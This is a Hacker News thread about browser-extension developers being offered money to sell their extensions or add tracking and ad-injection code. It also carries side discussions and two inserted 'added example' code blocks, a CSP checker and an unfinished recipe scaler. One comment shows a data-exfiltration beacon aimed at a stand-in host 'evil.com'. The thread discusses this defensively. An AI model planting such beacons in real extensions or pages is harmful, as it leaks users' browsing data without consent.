I no longer trust The Great Suspender (dafoster.net)
889 points by davidfstr on Jan 20, 2021 | 371 comments



As the developer of a pretty popular "utility" browser extension, I've been shocked by the volume of email I get every week about it.

On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".

Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).

  We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?

  Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.

  As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans. 

  Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.

Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.


I have two thoughts about this.

First, respond to every inquiry by telling them the price is USD$70,000,000.00. And stick to that price. Many of these sleazy companies get their leads from the same "lead generators," who will eventually take you off their lists because they know your terms are unreasonable. It doesn't work for everyone, but when I did it to spammers trying to buy my mailing list, it significantly reduced the volume of inquiries.

Second, put a page on your web site listing all of the offending companies, with links to the letter you received.

Apr 1, 2021 - Company X promised $3-5k/month if I alter your search results. Link.

Apr 3, 2021 - Company Y promised $1-5k/month if I promote their product on other people's web pages. Link.

A lot of people on HN will claim "O, noes! Lawyers! Libel!" I wouldn't worry about it. These people don't have the money for lawyers, are usually in geographies without legal systems, and don't want their names and other information exposed in a public legal filing. Plus, all you're doing is stating facts.


> by telling them the price is USD$70,000,000.00

There's a W C Fields joke that ends, "Madame, we've already established what sort of woman you are, now we're just haggling over price."


Every time they make a lower offer counter with a higher price. They will soon learn what kind of person they are dealing with.

If they actually do come up with $120,000,000 - at that point nobody will be surprised that you cashed out. They might be mad, but they won't blame you.


Case in point: Notch once said that his price for selling out Minecraft was $2B. When Microsoft eventually said "sounds fair" and gave it to him very few people found it easy to be mad at him.


To be fair, people found plenty of other things to be mad at Notch about.


They did, but it was all pretty unrelated. I thought GP's example was a good one.


That occurred a few years later


that was not what people got mad at notch about


People got mad at Notch for internet-age old reasons: expecting someone with high technical skills in one domain to have the right takes on social and political issues because they're now an internet social presence in addition to whatever creative work they've done. If people were realistic in their expectations of Notch, they'd never have been mad in the first place because they wouldn't have cared what inane ideas he spouted.


I don't think people on the internet are expected to "[take] on social and political issues"; they are expected to not be a piece of shit though. It costs $0 to not be a dick on the internet. It's free to not voice your opinion. You're not less of a person if you self-censor.


I wonder what the calculus was on the Microsoft side of the equation.

"It'd take more than 10-SWE-years to build a clone, so we should take his offer"?


They are paying for the brand, not the product. Microsoft is ensuring that they have mindshare in the next generation of gamers. That's critically important to maintaining their ongoing success in the gaming sector.

Similar to why Disney paid billions for Star Wars: the company was easily capable of replicating the product; the issue was replicating the brand. That brand has a proven track record of multi-generational appeal.


I think it's more than just the brand right? I can't speak for Disney and Star Wars because Star Wars was never my thing.

These creative endeavours have a soul, or an essence, for want of a better term. You can replicate a game or a movie and it will feel utterly soulless compared to the original, even if you can't visibly notice a difference.

You could reproduce Minecraft but even the most infinitesimal divergence from the original will make it feel fake. Maybe the controls have a different 'feel', or the way the scene is rendered feels a bit off. It's just not Minecraft any more. There are just so many quirks and details that will be lost in the translation, or even patched over if they're seen as bugs.

It's no different if you ported a game from Unity to Unreal and then to CryEngine. I'm sure that with a blind comparison you would be able to 'feel' the difference.

And the same for films. The way these things were created has a lot of influence over the end result.

On the other hand, it's exactly what can make a remake or remaster so successful. The Resident Evil 2 and 3 remakes that followed Resi 7 were phenomenal! Not totally faithful to the originals, didn't try to be...they just took an older game and gave it a new life.


I think you've just described a brand.

People don't go to Starbucks because it's the best, they go to Starbucks because mocha frappuccinos in Lima and London taste exactly the same. Any divergence, even an infinitesimal one, makes the frap feel fake.


Reminds me of the quests to recreate the secret recipe for Coca-cola.

The secret ingredient isn't orange peel, it's $4 billion a year in marketing.


Sure, marketing is important. But the "secret" ingredient is coca leaf extract. The actual cocaine is used to make various drugs by a different corporation.

https://www.businessinsider.com/what-happened-to-the-cocaine...

According to Business Insider, the beverage company has a deal with the Drug Enforcement Administration to get coca leaves so that the world can get its Coca-Cola fix. The DEA lets Coca-Cola import coca leaves from Peru and Bolivia in order to get the part of its secret recipe, which it hides behind the term "natural flavors" on the ingredients list.


You could recreate the brand and the product, and you still won’t have millions of users playing it. They bought the user base, too.


A brand is not just trade dress. It's a relationship between a company and the public. Recreating the brand means building those relationships.


Which can be done, but it is a long process. Most attempts only get a fraction of the big brand, and the exceptions generally have more to do with the failings of the big brand than the competition. Once people find something they like, as long as that thing doesn't do something stupid they won't be in a hurry to look at the competition in general. If there is any switching cost they are even less interested in trying something else. Which means that the not-number-one competitors need to be perfect in everything - which is hard when they are not getting as much revenue to begin with, and thus cannot afford to try out any seemingly good ideas that turn out bad only after you try them...


They rewrote anyways.


Well yeah, but they could use the brand, likeness and source code of the original; if they created a clone (and there are clones, hundreds of them) it would NEVER have gotten even one percent of the share. Plus there's the merchandise. There is an existing market for Minecraft merchandise, and a clone could never even get close to that network.

I mean how many kids do you see walking around in "Cube World" T-shirts? CastleMiner? FortressCraft? Take your pick: https://www.reddit.com/r/Minecraft/comments/lx5g3/complete_l...


Wait, they value one SWE-year at $200,000,000?


Funny point, but I assume they mean ten years for a problem they throw whole, enormous teams at.


My buddy loves buying and selling stuff from the local newspaper. Whenever people give a low ball offer he looks them directly in the face and in a very confident manner says: "I'm accepting asking price or anything higher!"

The looks on people's faces are incredible.


I sold a Chrome extension I wrote in the early days of extensions (for a lot less than $120M and with a lot less users, but meaningful numbers for both). It wasn't clear then just how bad the malware problem was.

People still blamed me.


I have no problem being "that sort of woman" for USD$70,000,000.00, over a browser extension.


There's a big difference between retirement money and day-job money, which applies both to this and the joke.


In the joke, $1m was offered. I don't know when he made that joke, but since he died in 1948, that's somewhere over $15m now. And houses were ridiculously cheap by modern standards, so that would have been retirement money for sure.


> A lot of people on HN will claim "O, noes! Lawyers! Libel!"

Libel is for false statements. If you've got a real email from the company then it's not false.


Sure, but that need not stop them from suing, which will cost you time and money, even if (when) you win.


In the USA, not true in the UK, for example.


Truth is a defence in the UK. If I read the Wikipedia article correctly, it's a defence everywhere. https://en.wikipedia.org/wiki/English_defamation_law

There are differences: in the USA the statement is assumed true, and must be proved false if libel is to succeed. In the UK the statement is presumed to be false, and the libel will succeed unless proved true.

I wonder what the GDPR has to say about publishing a private email?


The difference in the UK really comes down to the cost of defending oneself. Engaging in a court case is not a costly undertaking and this would likely be a quick in-and-out case, as long as you have the evidence to back up their claims.

I imagine either party in an email conversation have the right to publish the email, unless some terms were agreed in advance or the subject is expressly personal.


AFAIK, for ordinary snail mail ownership goes to the recipient in most (all?) European countries: You can't claim copyright on a letter you sent to someone else. Can't see why the same shouldn't go for e-mail. If you wanted something to remain “private”, don't give it to someone. (At least not without having them sign an NDA first).


I also have some extensions with users in the tens of thousands and can corroborate all of this. Out of curiosity I strung one "buyer" along to see how much they would offer and they quoted $0.20 per user. With the amount of money being thrown about, as sad as it is, it's no surprise that some devs end up selling out their users.

In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust.

Something needs to change. As long as extensions have such weak sandboxing along with such poor app review, Google/Mozilla etc will keep willingly shipping spyware unbeknownst to their users.

At least some mechanism of creating and verifying reproducible builds would go a long way.


"In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust."

I completely agree. There are a number of features I would really like to use in Firefox that are available only as extensions and I continue to resist installing them.

In fact, the only extension I use is uBlock origin - which is based on a fairly rich social and community history behind that project and its author ...


Stick to the Firefox Recommended Addons list. Those are the only ones which are code reviewed by real people.

And uBlock Origin is in that list.


More and more I feel like we need another new manifesto.

We need to pull people together who have a passion for making the world's computers just work and build a brand around simple extensions and apps that are TRULY FREE. As in, they don't have features removed that you can only unlock through a paid version, they don't have ads, they don't sell tracking data, source is open, and anyone can support them through optional donations, but they don't nag you for anything.

Stallman distinguished between free as in freedom and free as in beer. I don't think he went far enough.

I'm more radical because we are users first, all of us, and only by using great software are we able to be makers.

And I think about my typical experiences as a user. Often, using a piece of software that was pretty great, then suddenly out of nowhere, a popup, it was a free trial and the full version costs some exorbitant amount. Or the software that was suddenly bought out and shut down. Or the "five star" app that is already full of spam.

Then I contrast that with those programs that just don't ask for anything. You keep expecting it, but it's just genuinely something truly free that works. They weren't optimizing revenue, they were optimizing function. That feeling of finding that perfect FOSS or community developed app, it's just sublime.

Some user had a problem they wanted to solve, once they solved it, it was just a gift to the world, implicitly asking people at most to think about paying it forward.

We should make stuff that emulates our ideal experiences, not our worst experiences. We should spread that same kind of joy we've felt. If one in a thousand pays it forward, the options spread. The oak tree doesn't waste time trying to extract revenue from every squirrel, it knows one in a thousand will bury an acorn somewhere and build the forest.

And it's especially needed now. There was a time in the early internet where there was just abundant freeware on the internet. Postcardware, donationware, people genuinely trying to make an entire open source ecosystem.

Then we got app stores. "Curated," but not for that ultimate sublime user experience. Curated for sustainable profit back to the marketplace. Curated to make the biggest revenue earners find the exact bottom line of scumminess without getting banned, and encourage them to duplicate that model, then inspire copycats flooding the entire app ecosystem.

I know the rebuttal, devs need to get paid. Sure, I'm not an absolutist; this path isn't for everyone or every project. But I've worked with some people who make many of their contributions as free as possible, and they include some incredibly talented and hardworking folks who might be a little bit crazy. The thing that unites them all is that they're passionate about making the world a better place. They are lucky to have the freedom to do it, but it's still praiseworthy that they use that freedom for everyone, when it'd be easy not to bother.

I know there are free cycles in the system out there where people code out of a desire to help. Just need to have a unifying purpose, a call to action, that's how so many of the great movements like open source originally started. Just have to have 1% of people believe in it, then so many incredible things happen.


Too longwinded I guess.

Absent any counterargument, I stand by the premise that app stores and extension marketplaces are teeming with junk, that curation has failed as a model.

It wasn't always like this. It doesn't have to be like this.

We just need to build something better.

Maybe the above path isn't the way. Ok, what do you think would be a better way to fix the current system?


If you can make thousands a month on tens of thousands of users, that’s (very much ballpark) $0.10 per user per month.

Paying $0.20 per user to buy that seems extremely low.

Also, on the sandboxing/app review of extensions, does anybody know how well Apple vets Safari extensions? (I guess that could be hard if the evil parts are time-triggered, certainly if the code also is obfuscated (possibly in the name of minification).)


Who said they were earning thousands a month for their extension?


If the malware seller can make $0.10 / user / month, then paying the extension developer a one-time fee of $0.20 * users is only three months to pay back. Thus considered a low price for the extension developer but still attractive to the extension developer who likely earns $0 / user from their extension.


He didn't ask about the math, he wanted to know where it was said that they could earn "tens of thousands" (and I believe that is stated in the middle of the root post of this thread)


Also, a business model for extensions would be good - even if it's just an official "tip box" that enthusiastic users can pay into


The only extensions I have are privacy extensions. Do people on here really install a bunch of random 3rd party extensions?


Privacy extensions can be crap too. Cutting off web-based analytics makes the telemetry from those users much more valuable.

Ghostery anyone?

https://www.reddit.com/r/privacy/comments/59wiln/is_ghostery...


I wouldn't class The Great Suspender as a "random 3rd party extension", it's a performance tool.


Probably not on here, no. But out there... definitely yes.


With that kind of money being offered (assuming it is in the ballpark of true)... I wonder how many popular free extensions already have some of that junk in it and nobody's noticed. Maybe many of them? I could see a lot of devs who started out writing an extension as a non-paying hobby, having trouble turning down the free money.

I feel like this is another prong in the story about threats to sustainability of open source done the way it used to/has been done previously.


> assuming it is in the ballpark of true

It is. It’s very easy to generate big money with ad replacement or proxies.


Some years ago I applied at a "data analytics" startup founded by a locally famous founder. Their official purpose was something something search something social media. Not in the US, but he was featured on our local version of Shark Tank at some point.

During interview it became clear that their "product" was actually bundled malware that replaced google's and other ads in the browser. Evidently hot founder guy was using this startup as cash cow for his other ventures.

There was some noise in the press about it a couple years later and founder guy defended himself saying he sold the company and wasn't responsible, except it was already malware when I interviewed and he was still owner so I know it's bullshit.


He is well known for that in the local startup crowd ;)


What makes ad replacement malware? Presumably the users don’t care as long as the replacement ads aren’t of horrible quality. It’s definitely a bit cheeky, but malicious? I don’t think so.

This seems like a fairly benign monetization scheme, it’ll hurt some sites that depend on ad revenue but not any more than adblockers.


Call it grayware if you prefer, it's still hot garbage.

Monetization is the process of converting user value into money. If you don't provide any value it's not monetization it's just mining.


Well, the whole point is to bundle this with a product that generates value for the user.


And it's something I'm surprised Google hasn't done more to stop considering these people are basically stealing their revenue in their own browser


I fell for one of these offers on the first thing I made that got any traction -- it was a browser extension that solved an issue with a common photo hosting site, and I organically ended up with 25,000+ users, mostly on Chrome.

Eventually the photo hosting service itself solved the problem that my extension was solving, but pretty much everyone who'd installed the extension still had it installed.

At some point, a company offered to buy it from me for a couple thousand dollars -- I was 18, and it seemed like a miracle! They asked me to add some code to the extension, and I assumed their intentions were good. I added their code, which I now realize was some sort of tracking/advertising program...and my extension promptly got taken down by Google.

Quite the learning experience!


Did Apple compensate you for your work porting your extension?


No, but Apple and MS both consider the increased visibility and growth in user count from being "featured" in their marketplaces as a nice bonus for the developer. If I were a business generating revenue from app subscriptions, I'd jump all over it.


"We can't pay you, but you'll get exposure"


If you are generating revenue exposure can be very useful. However if you don't already have a good business model it just digs your hole deeper. Be very careful to be sure which you are in.


> "We can't pay you, but you'll get exposure"

... said the venue owner to the musician.

It’s a frighteningly common invit^H^H^H^H^H^H exploitation providing free labour to owners of gathering places benefitting from that labour (like bars and browsers and operating systems and social networks, etc).


Why should the venue owner pay the musician?

It's not an iron-clad given that the musician provides value to a venue.

Musicians who are confident they can bring business to a venue negotiate with confidence and get paid.

Those who play for free are ones who don't have that confidence.

What you accept is what you cost. That's the market rate.

How about this argument. Say I have a restaurant. Typically that means there is some landlord, and I pay them utilities and rent in exchange for using the space. Now some guitar-strumming, crooning ape wants to perform in the same space. If he and I are to be considered part of the same organization, we are on the same level of the "org chart". We are sharing the space and doing our thing. Why would I pay him anything? He should pay part of the rent and utilities. Or, why not the other way around?

Let's reverse it. Suppose a musician has a venue where he performs every night, and people come. Paying people. Suppose I want sell hot-dogs and sandwiches there, and he lets me do that. Why the fuck should he also pay me anything? He would be right to ask me to pay some sort of rent.

Now if I give the hot dogs and sandwiches for free, so that many more people come, and those people pay to get into this music venue, then there is a case that I'm increasing the business, and doing it out of my pocket. Still, that is my problem; I shouldn't be doing such a thing. Maybe I know what I'm doing! Or maybe I'm trying out new product to see how people like it or whatever (market research).


Context matters: It's a very different dynamic, depending on who approaches whom.

If the venue owner does the approaching (as in the context of the post raising this sub-thread) like Apple, Microsoft or Google approaching extension developers) it's questionable.

If the musician (or the extensions developer) approaches the venue owner, it's an entirely different story.

One has exploitation written all over it, the other not so much.

The context of the great-great-...-parent post suggests the exploitative version.


> How about this argument. Say I have a restaurant. Typically that means there is some landlord, and I pay them utilities and rent in exchange for using the space. Now some guitar-strumming, crooning ape wants to perform in the same space. If he and I are to be considered part of the same organization, we are on the same level of the "org chart". We are sharing the space and doing our thing. Why would I pay him anything? He should pay part of the rent and utilities. Or, why not the other way around?

Owners are allowed to do a lot of things that would be considered exploitative in an employment relationship: they can work excessive hours, below minimum wage, etc.. If they're a genuine owner getting their share of the upside, it's fair enough.

> Now if I give the hot dogs and sandwiches for free, so that many more people come, and those people pay to get into this music venue, then there is a case that I'm increasing the business, and doing it out of my pocket. Still, that is my problem; I shouldn't be doing such a thing. Maybe I know what I'm doing! Or maybe I'm trying out new product to see how people like it or whatever (market research).

You're not allowed to form relationships that are indistinguishable from illegally-exploitative employment, for the same reason you're not allowed to run the shell game even if you do it 100% honestly. You'll find a lot of similar rules around charities that don't make sense on the surface, but are the only way to have a regulatory regime that protects people: you're not allowed to volunteer for or donate to the same organisation you work for, volunteers aren't allowed to be paid, volunteers can't do the exact same activities that they do for the charity but for a non-charity business...


As the other commenter said, the venue owner should pay the musician in the context provided by the parent poster, because the venue owner is the one asking the musician to play at their venue. Context matters.

The situation being called out, is the very situation that flows from your hypothetical restaurant owner's contemptuous disregard for the "guitar-strumming, crooning ape".


If a venue representative passes a hint to some musicians that a free space for jamming is available certain days of the week and certain hours, with some sound equipment and possibly an audience, is that an invitation which obliges them to pay the musicians? Certainly not.

The one thing that makes the context different is if the venue wants very specific musicians, and all of their choices are pros who expect to get paid. The venue can't get any of the musicians it wants without paying and that's that.

If a venue is not picky about musicians, it can easily get free ones. So many free ones that if three of them cancel, it can still call a fourth to come over.


> and all of their choices are pros who expect to get paid

I disagree that an alternative exists. Pay them for their time. They're enriching your business, or at the very least, providing you with their time and expertise.

> If a venue is not picky about musicians, it can easily get free ones

The way you talk about musicians (see also your "ape" comment earlier) sounds like you don't value them as people.


> They're enriching your business, or at the very least, providing you with their time and expertise.

What? Not necessarily at all. Say I have a bar that is completely dead on a Wednesday night, due to it being Wednesday night and it being in some off part of town.

I could advertise that I have some free jam space for musicians, a drum kit and a PA with a few microphones and maybe some guitar/bass amp or speaker cabinet. Maybe people will show up to make some noise. Those same people (and maybe a few of their friends) will buy a few drinks, and that's where the "enriching my business" part comes in.

Nobody is required to buy a drink, and so this is a better offer than them having to actually rent equipment and room.


Your analogy only works if in the first case it's the musician who pockets the entry fee. Or, in the second, the payment for the food. The second, you specified they didn't (you “sell” the hot dogs, i.e. presumably pocket the payment yourself). The first is usually not the case.

So your analogy doesn't work.


"Why should the venue owner pay the musician?"

Because a music venue without musicians isn't


No, it isn't a music venue without musicians.

But the implied flow of money doesn't follow from that.

Suppose I own an empty space with a little stage, a PA sound system, and some 100 chairs. I put a down payment on this place, paid for equipment and upgrades and have to pay property taxes, utilities and mortgage. If nothing happens there, I lose money out of my own pocket. I intend for it to be a music venue. I meet the definition of a music venue owner.

Some musicians have contacted me and would like to have a concert there.

Should anyone pay anyone? Who should pay whom?

How is this for logic: "A house isn't a home without a family! If you want me to move into this house with my wife and three kids to make it a home, you're gonna have to pay me!"


It depends.

For many musicians it is not a career, but a hobby. An outlet for creativity. (That is me.) In which case we choose venues that are like us. Our most recent gig was at our local Musicians Club https://youtu.be/URwzKL8pjQo?t=819

For others it is an important part of their income, so they should be paid.

Who should pay? If the punters pay a door charge the band should get it (that is the tradition here) if not then, yes, the owner of the venue pays it.


Musicians making an income simply have to avoid opportunities that they have outgrown: free jam spaces, open mics, and whatnot.


Generally speaking musicians are the last to get paid and the first to blame.


But a dive bar is still a dive bar and a casual restaurant still a restaurant...


I disagree with this sentiment. People go to a music venue for the music, they go to a bar for the drinks and a restaurant for the food.

If the bar had no drinks, it could hardly be called a bar. Similarly, a restaurant with no food is hardly a restaurant.

In the meantime, where the reason to go there is missing, these are all just rooms with the potential to be something later. The same goes for the music venue; it's just a big room that could be a music venue if there were actual musicians there.


A dive bar is still a place where people pay for drinks, and not for music.

The "open mic" is on Tuesday nights, because nobody goes there then, so there is no harm to the business, and the people who come to have open mic fun might buy drinks.


And in Apple's case, you can pay $99/year for the exposure...


For a couple projects and apps I worked on, exposure in one of these stores would be worth a decent amount of engineering effort. You can convert that exposure into users, marketing "buzz", validation of the app's worth to third parties, etc.

This isn't universal, of course. But not all payment comes in liquid form!


Said every ad platform ever.


> what is your estimated price?

Say, $5 per active user; non-exclusive license: I can maintain my fork of the extension, and use any of the code in new projects.


Ask Apple or Microsoft for a full time job to work on it =)


They'll offer you a full-time job and then you won't be able to work on it :P


Do extensions require any permissions to make requests? It seems like a strict sandbox that prevents data from flowing out of a page via an extension would help, if the extension is something like a JSON renderer.


Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.


> Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.


Restricting the extension to pre-baked URLs means it takes several page loads to exfiltrate something, but doesn't stop it.


There would be ways to trick the original page into adding stuff for you.

For example, you could patch some of the original script of the page and wait for it to be run.


Couldn't CSP be used to limit which paths were valid URLs?

There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.


Extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.


Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.
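The exfiltration path described earlier in this subthread (an injected `<img>` whose URL carries page data) and the CSP question raised in the replies, as an added example that is not part of the thread: a small JavaScript checker that pulls resource URLs out of a page fragment and tests each one against a Content-Security-Policy, showing that a `default-src 'self'` policy refuses the beacon while a permissive `default-src *` lets it through. The page fragment, the hosts `shop.example.com`, `cdn.example.org` and `collector.example.net`, the query value and both policies are constructed for the example. The matcher covers only the `'self'`, `*`, scheme, host and `*.host` source forms, and, as the thread itself notes, an extension that can rewrite response headers can also strip the policy, so this is a detection aid for a page owner, not a sandbox.

```javascript
// Added example, not code from the thread: find resource URLs in a page
// fragment and test each against a Content-Security-Policy, to show which
// ones an img-src / default-src restriction would block.

// Constructed sample: a page fragment where an extension has appended an
// <img> whose query string carries page data (the beacon pattern above).
// All hosts and values here are made up for the example.
const PAGE_ORIGIN = "https://shop.example.com";
const SAMPLE_HTML = `
<html><body>
<img src="/static/logo.png">
<script src="https://cdn.example.org/app.js"></script>
<img src="https://collector.example.net/p?data=82374682376">
</body></html>`;

// Which CSP directive governs each element type (subset of the spec).
const DIRECTIVE_FOR = { img: "img-src", script: "script-src", iframe: "frame-src", link: "style-src" };

// Pull (tag, absolute URL) pairs out of the fragment. A regex is enough for
// this well-formed constructed input; a real scanner would walk the DOM.
function extractResourceUrls(html, pageOrigin) {
  const re = /<(img|script|iframe|link)\b[^>]*\s(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    found.push({ tag: m[1].toLowerCase(), url: new URL(m[2], pageOrigin).href });
  }
  return found;
}

// "default-src 'self'; script-src 'self' https://cdn.example.org" ->
// { "default-src": ["'self'"], "script-src": ["'self'", "https://cdn.example.org"] }
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Does one source expression ('self', *, https:, host, *.host) allow this URL?
function sourceMatches(expr, url, pageOrigin) {
  const u = new URL(url);
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "*") return true;
  if (e === "'self'") return u.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return u.protocol === e; // scheme source, e.g. https:
  let scheme = null;
  let host = e;
  const idx = e.indexOf("://");
  if (idx !== -1) { scheme = e.slice(0, idx); host = e.slice(idx + 3); }
  host = host.split("/")[0]; // any path part of the source is ignored here
  if (scheme !== null && u.protocol !== scheme + ":") return false;
  if (host.startsWith("*.")) return u.hostname.endsWith(host.slice(1));
  return u.host === host || u.hostname === host;
}

// Fall back to default-src when the specific directive is absent, as CSP does.
function cspAllows(policy, directive, url, pageOrigin) {
  const csp = parseCsp(policy);
  const sources = csp[directive] !== undefined ? csp[directive] : csp["default-src"];
  if (sources === undefined) return true; // nothing in the policy restricts this fetch
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Return the URLs in the fragment that the policy would refuse to load.
function findBlockedResources(html, policy, pageOrigin) {
  return extractResourceUrls(html, pageOrigin)
    .filter((r) => !cspAllows(policy, DIRECTIVE_FOR[r.tag], r.url, pageOrigin))
    .map((r) => r.url);
}

const STRICT_POLICY = "default-src 'self'; script-src 'self' https://cdn.example.org";
const LAX_POLICY = "default-src *";

console.log("blocked under strict policy:", findBlockedResources(SAMPLE_HTML, STRICT_POLICY, PAGE_ORIGIN));
console.log("blocked under lax policy:", findBlockedResources(SAMPLE_HTML, LAX_POLICY, PAGE_ORIGIN));
```

Under the strict policy only the collector URL is reported, because `img-src` is absent and the `default-src 'self'` fallback rejects the foreign origin; under `default-src *` nothing is reported. Running the same check over a page's actual DOM after extensions have loaded is one way a site owner can notice injected beacons, with the caveat from the thread that a sufficiently privileged extension can edit the header the check relies on.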


The monetisation angle is hard. As soon as you activate it then the expectations ramp up even more than the (likely) current flow which is likely non-trivial right now as it stands. My experience on a smaller scale was only tens-of-emails per day. And that was actually overwhelming for my little hobby that had no possibility of monetisation. The idea of thousands of support emails from people with expectations doesn't spark joy at all.

Rhetorical questions: Do you want to support this thing? How much time does it take? Is this effort you want to spend? Are you not monetising this for a purpose? Are you happy with that purpose (obviously yes)? Do you still enjoy spending time on it? Do you see that time as well spent? Are the expectations from your side still being met? Are the expectations from everyone else still reasonable?

After all those questions, the basic answer is probably: you don't want to monetise it because it will wreck the actual purpose for which it's intended, or alternatively there isn't much of a monetisation possibility due to its nature. But you can't spend more time on it because you have other Things to Do, like making money in other ways.

(At least this is my impression based on my experience)


Is this Luminati? [0] Because this sounds so much like Luminati ("Hola").

[0] https://luminati.io/


Why redact? I'm curious about who is doing this.


Agreed. These people need to be named and shamed.


It'd be annoying for the poster if they got mad, with an unlikely but potential legal encounter involved, and 99.9% of the community will never interact with the company. Even the few that do would likely realize their scummy business strategy immediately. Not worth it here.


> so I am not keen to do it again until I have more free time

Aww man, I'm really sad to hear that RecipeFilter won't be coming to Safari anytime soon. I really got my hopes up after it was in the keynote!

Since Apple distributes extensions in the App Store, have you thought about charging a buck or two for the Safari version? I know everyone says this, but I'd pay...


Is this any different than Railway Programming? Or is this more specifically applicable to high order components?

https://fsharpforfunandprofit.com/rop/


> Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased.

Do they ask you to do that for free or is there a monetary amount they tack on?


What is your extension called?



Is this open source by any chance?


This is an open source project: https://github.com/sean-public/RecipeFilter


Thanks!


Make sure your email account and browser extension accounts are secure... if you're a valuable target for scammers, you're also a target of getting your browser extension stolen from you.


I feel there's a moneymaker here - create a popular open source extension, sell it off when you get a good deal, fork the code and let everyone find out the old version is "evil".


"Trust for software" is largely reputation based - I don't have the time to read all the code to Blender; I trust that Blender.Org people are Nice TM or that at least someone Nice TM has read the code.

Once you burn your reputation by "selling out" the first time, who will trust your new forked version?


Crazy. Can I ask what extension this is? Wish I had the problem of tens of thousands of new users wanting my product weekly :)


Per an older comment, it's for pulling recipes off of awful recipe blogs. Having stumbled into recipe blogs before, the demand is understandable!

https://chrome.google.com/webstore/detail/recipe-filter/ahlc...


Going one step further, I found AnyList[1] on this forum a while back and they also have a similar extension for extracting recipes from awful blogging sites.

The added benefit with AnyList is that you can import ingredients directly into your grocery list from the extension. Been a huge time saver for me

[1] https://www.anylist.com/


Paprika [0] can also parse any blog/recipe site and import the recipe. Then you can add items from recipes to your shopping list. I highly recommend this app, I've converted many friends over to it. It's a much better experience than trying to scroll through a blog post while cooking.

[0] https://www.paprikaapp.com/


I'll add that I recently found how well Paprika handles printing recipes you have in your library. I wanted to print off a bunch of recipes to put in a binder and was very happy with how clean and simply formatted each recipe was, often with room to write notes on the paper. My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.


> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.

I normally abhor "social" features being tacked on when they aren't useful but I'd pay for all the apps over again for this feature. Thankfully the API is pretty straightforward. This repo of mine [0] is super dated but it was still working the last time I played with Paprika's API.

I've toyed around with setting up a little web app that my friends can log in to with their Paprika creds (I know, I know, but I'd tell them to use a one-off password for this) so that they can use the web app to either push or pull recipes from each other.

Thankfully you can send the full paprikarecipe file via email and import it, but it's a little clunky, and things like Discord (which my friends use to chat) don't like file extensions over 12 characters (IIRC), so it just cuts off the rest of the extension characters, leaving you with a file you can't open (without fixing the extension). I have some initial work to set up an AWS SES address that people can send recipes to that will then drop a preview and link to download (not an attachment, it would be hosted on S3) the recipe into a "recipes" Discord channel we use, but it's still a WIP.

[0] https://github.com/joshstrange/paprika-api


> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.

My wife and I work around that by simply using the same paprika account for cloud sync...

Paprika is a huge time and sanity saver for me - it'd be totally possible, but much harder for me to cook for big events without it!


I love Paprika, my one complaint about it is that you have to be careful with the ingredients multiplier feature. It only touches the number at the start, so "1 large onion thinly sliced, about 2 cups" turns into "2 large onion thinly sliced, about 2 cups."

If you're not paying attention you can miss that it really needs 4 cups.


Agreed, I've run into the same issue. I had hoped that the numbers row they show above the keyboard (on mobile) meant they were "special numbers" that would scale but alas it only scales the first number AFAICT.
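The multiplier problem described in the two comments above, as an added example that is not Paprika's code: a scaler that adjusts every quantity in an ingredient line rather than only the leading number, so "1 large onion thinly sliced, about 2 cups" doubled becomes "2 large onion thinly sliced, about 4 cups". The rule it applies is an assumption for the example: a number counts as a quantity when it opens the line or is followed by a unit word from a small constructed unit list, which keeps mid-line numbers such as oven temperatures and cooking times from being scaled.

```javascript
// Added example, not Paprika's code: scale every quantity in an ingredient
// line, not only the leading one, so a trailing "about 2 cups" follows the
// multiplier. A number is treated as a quantity when it opens the line or is
// followed by a unit word; other numbers (temperatures, times) are left alone.

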